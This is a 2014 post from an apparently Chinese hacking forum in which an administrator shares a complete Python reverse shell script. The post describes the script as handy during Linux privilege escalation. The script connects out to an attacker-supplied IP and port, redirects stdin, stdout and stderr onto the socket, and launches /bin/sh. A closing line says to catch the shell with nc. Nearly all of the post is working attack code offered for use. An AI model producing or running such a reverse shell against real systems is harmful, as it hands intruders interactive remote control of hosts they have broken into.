搜索
查看: 573|回复: 0

Python反弹shell

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-6-9 17:42:10 | 显示全部楼层 |阅读模式
     反弹的shell其实就是bash shell,只不过用Python建立连接,然后通过socket的方式达到交互的目的,Linux溢出提权的时候比较有用。例子有很多,这里分享个简单小巧的。

  1. #!/usr/bin/python
  2. import sys,os,socket
  3. print "----------------------------------------"
  4. print "|         Python Reverse Shell         |"
  5. print "----------------------------------------"

  6. def usage():
  7.         print "usage: ./shell.py <ip> <port>"
  8.         print "example: ./ shell.py 192.168.1.11 1234"

  9. def main():
  10.         if len(sys.argv) != 3:
  11.                 usage()
  12.                 sys.exit()
  13.         
  14.         ip = sys.argv[1]
  15.         port = int(sys.argv[2])
  16.         
  17.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  18.         
  19.         try:
  20.                 s.connect((ip, port))
  21.                 print "[*] Connected success."
  22.         except:
  23.                 print "[*] Connect failed(%s:%s)" % (ip, port)
  24.                 sys.exit()
  25.         
  26.         s.send("----------------------------------------\n")
  27.         s.send("|          Python Reverse Shell        |\n")
  28.         s.send("----------------------------------------\n")

  29.         os.dup2(s.fileno(), sys.stdin.fileno())
  30.         os.dup2(s.fileno(), sys.stdout.fileno())
  31.         os.dup2(s.fileno(), sys.stderr.fileno())
  32.         os.system("/bin/sh")                  #或者/bin/bash
  33.         s.close
  34.         s.send("Bye!")

  35. if __name__ == "__main__":
  36.         main()
复制代码

反弹以后可用nc等工具连接获得交互式shell
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表